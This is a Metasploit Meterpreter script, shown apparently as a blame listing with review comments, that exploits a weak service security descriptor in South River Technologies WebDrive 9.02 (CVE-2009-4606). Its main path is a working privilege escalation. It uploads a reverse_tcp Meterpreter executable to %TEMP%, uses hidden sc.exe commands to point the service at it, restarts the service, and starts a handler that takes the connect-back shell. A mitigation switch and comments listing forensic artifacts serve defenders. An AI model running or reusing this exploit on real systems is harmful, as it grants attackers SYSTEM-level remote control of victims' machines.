| 1 | 6f53dad3 | Joshua Drake | # $Id$
|
|---|---|---|---|
| 2 | 62c8c6ea | Joshua Drake | # $Revision$
|
| 3 | 6f53dad3 | Joshua Drake | |
| 4 | 6f53dad3 | Joshua Drake | ##
|
| 5 | 6f53dad3 | Joshua Drake | # South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
|
| 6 | 6f53dad3 | Joshua Drake | #
|
| 7 | 6f53dad3 | Joshua Drake | # This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
|
| 8 | 6f53dad3 | Joshua Drake | # Due to an empty security descriptor, a local attacker can gain elevated privileges.
|
| 9 | 6f53dad3 | Joshua Drake | # Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
|
| 10 | 6f53dad3 | Joshua Drake | # Vulnerability mitigation featured.
|
| 11 | 6f53dad3 | Joshua Drake | #
|
| 12 | 6f53dad3 | Joshua Drake | # Credit:
|
| 13 | 6f53dad3 | Joshua Drake | # - Discovery - Nine:Situations:Group::bellick
|
| 14 | 6f53dad3 | Joshua Drake | # - Meterpreter script - Trancer
|
| 15 | 6f53dad3 | Joshua Drake | #
|
| 16 | 6f53dad3 | Joshua Drake | # References:
|
| 17 | 6f53dad3 | Joshua Drake | # - http://retrogod.altervista.org/9sg_south_river_priv.html
|
| 18 | 6f53dad3 | Joshua Drake | # - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
|
| 19 | 6f53dad3 | Joshua Drake | # - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
|
| 20 | 6f53dad3 | Joshua Drake | # - http://osvdb.org/show/osvdb/59080
|
| 21 | 6f53dad3 | Joshua Drake | #
|
| 22 | 6f53dad3 | Joshua Drake | # mtrancer[@]gmail.com
|
| 23 | 6f53dad3 | Joshua Drake | # http://www.rec-sec.com
|
| 24 | 6f53dad3 | Joshua Drake | ##
|
| 25 | 6f53dad3 | Joshua Drake | |
| 26 | 6f53dad3 | Joshua Drake | #
|
| 27 | 6f53dad3 | Joshua Drake | # Options
|
| 28 | 6f53dad3 | Joshua Drake | #
|
# Switch table for the script: each switch maps to [takes_a_value, help_text].
# "-h" and "-m" are flags; "-r" and "-p" carry the connect-back address and port.
switch_table = {
  "-h" => [false, "This help menu"],
  "-m" => [false, "Mitigate"],
  "-r" => [true, "The IP of the system running Metasploit listening for the connect back"],
  "-p" => [true, "The port on the remote host where Metasploit is listening"]
}
opts = Rex::Parser::Arguments.new(switch_table)
| 35 | 6f53dad3 | Joshua Drake | |
| 36 | 6f53dad3 | Joshua Drake | #
|
| 37 | 6f53dad3 | Joshua Drake | # Default parameters
|
| 38 | 6f53dad3 | Joshua Drake | #
|
| 39 | 6f53dad3 | Joshua Drake | |
# Service and image names this script looks for on the target.
sname, pname = 'WebDriveService', 'wdService.exe'

# Connect-back defaults; "-r" and "-p" replace them during option parsing.
# NOTE(review): source_address presumably resolves the local address used to
# reach the sample destination "1.2.3.4" - confirm against Rex::Socket.
rport = 4444
rhost = Rex::Socket.source_address("1.2.3.4")
| 44 | 6f53dad3 | Joshua Drake | |
| 45 | 7d665e8a | Carlos Perez | #check for proper Meterpreter Platform
|
# Report that the session's Meterpreter flavour cannot run this script and
# end the script by raising Rex::Script::Completed.
#
# @raise [Rex::Script::Completed] always
def unsupported
  message = "This version of Meterpreter is not supported with this Script!"
  print_error(message)
  raise Rex::Script::Completed
end
# Everything below drives Windows service-control commands, so stop unless the
# session reports a win32/win64 platform.
unless client.platform =~ /win32|win64/i
  unsupported
end
| 51 | 6f53dad3 | Joshua Drake | #
|
| 52 | 6f53dad3 | Joshua Drake | # Option parsing
|
| 53 | 6f53dad3 | Joshua Drake | #
|
# Walk the supplied arguments. "-h" and "-m" finish the script by raising
# Rex::Script::Completed; "-r" and "-p" only override the connect-back defaults.
opts.parse(args) do |switch, _index, value|
  if switch == "-h"
    print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
    print_line(opts.usage)
    raise Rex::Script::Completed
  elsif switch == "-m"
    # Remediation path. The DACL handed to `sc sdset` grants:
    #   AU (Authenticated Users)     - query / interrogate / read control only
    #   PU (Power Users)             - the same plus RP (start)
    #   BA (Built-in Administrators) - full set, including DC (change config), WD, WO
    #   SY (Local System)            - start / stop / pause-continue, no DC
    # Only administrators keep DC, the right that `sc config ... binpath=` needs.
    sddl = 'D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)'

    # NOTE(review): the descriptor is rewritten only while wdService.exe shows up
    # in the process list; a stopped service keeps its weak descriptor and this
    # branch then completes without reporting anything.
    client.sys.process.get_processes().each do |entry|
      next unless entry['name'] == pname

      print_status("Found vulnerable process #{entry['name']} with pid #{entry['pid']}.")
      print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
      client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" #{sddl}", nil, {'Hidden' => 'true'})
    end
    raise Rex::Script::Completed
  elsif switch == "-r"
    rhost = value
  elsif switch == "-p"
    # to_i yields 0 for non-numeric input; no range check is made here.
    rport = value.to_i
  end
end
| 78 | 6f53dad3 | Joshua Drake | |
# Exploit path, reached only when neither "-h" nor "-m" ended the script.
# For every running wdService.exe it uploads a generated executable, points the
# service's binary path at it, restarts the service and then restores the path.
#
# Artifacts a defender can look for, all visible in the steps below:
#   - an .exe with a random 6-13 letter name written to the user's %TEMP%
#   - sc.exe launched through a hidden "cmd.exe /c"
#   - the service's binary path (ImagePath in the service's registry key)
#     pointing outside %ProgramFiles%\WebDrive
# The uploaded file is never deleted by this script, so it stays on disk.

# Runs one command line on the target with the window hidden.
run_hidden = lambda do |command_line|
  client.sys.process.execute(command_line, nil, {'Hidden' => 'true'})
end

client.sys.process.get_processes().each do |entry|
  next unless entry['name'] == pname

  print_status("Found vulnerable process #{entry['name']} with pid #{entry['pid']}.")

  # Generate the reverse_tcp payload and wrap it in a Win32 PE image.
  payload = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
  payload.datastore['LHOST'] = rhost
  payload.datastore['LPORT'] = rport
  pe_image = Msf::Util::EXE.to_win32pe(client.framework, payload.generate)

  # Upload the image to %TEMP% under a random alphabetic name.
  temp_root = client.fs.file.expand_path("%TEMP%")
  random_stem = Rex::Text.rand_text_alpha(rand(8) + 6)
  tempexe = temp_root + "\\" + random_stem + ".exe"
  print_status("Sending EXE payload '#{tempexe}'.")
  remote_file = client.fs.file.new(tempexe, "wb")
  remote_file.write(pe_image)
  remote_file.close

  # Stop the service before its configuration is changed.
  print_status("Stopping service \"#{sname}\"...")
  run_hidden.call("cmd.exe /c sc stop \"#{sname}\" ")

  # Point the service's binpath at the uploaded file; this is the step the
  # mitigation descriptor ("-m") denies to non-administrators.
  print_status("Setting \"#{sname}\" to #{tempexe}...")
  run_hidden.call("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}")
  sleep(1)

  # Start the service again so it launches the configured binpath.
  print_status("Restarting the \"#{sname}\" service...")
  run_hidden.call("cmd.exe /c sc start \"#{sname}\" ")

  # Handler job that receives the callback in the session's workspace.
  listener = client.framework.exploits.create("multi/handler")
  {
    'WORKSPACE' => client.workspace,
    'PAYLOAD' => "windows/meterpreter/reverse_tcp",
    'LHOST' => rhost,
    'LPORT' => rport,
    'ExitOnSession' => false
  }.each { |key, setting| listener.datastore[key] = setting }

  listener.exploit_simple(
    'Payload' => listener.datastore['PAYLOAD'],
    'RunAsJob' => true
  )

  # Restore the service's binpath.
  # NOTE(review): %ProgramFiles% normally expands to a path containing a space
  # and the value is passed unquoted, so the stored path may differ from the
  # vendor's original - responders should verify the service configuration on
  # any host where this script ran.
  run_hidden.call("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}")
end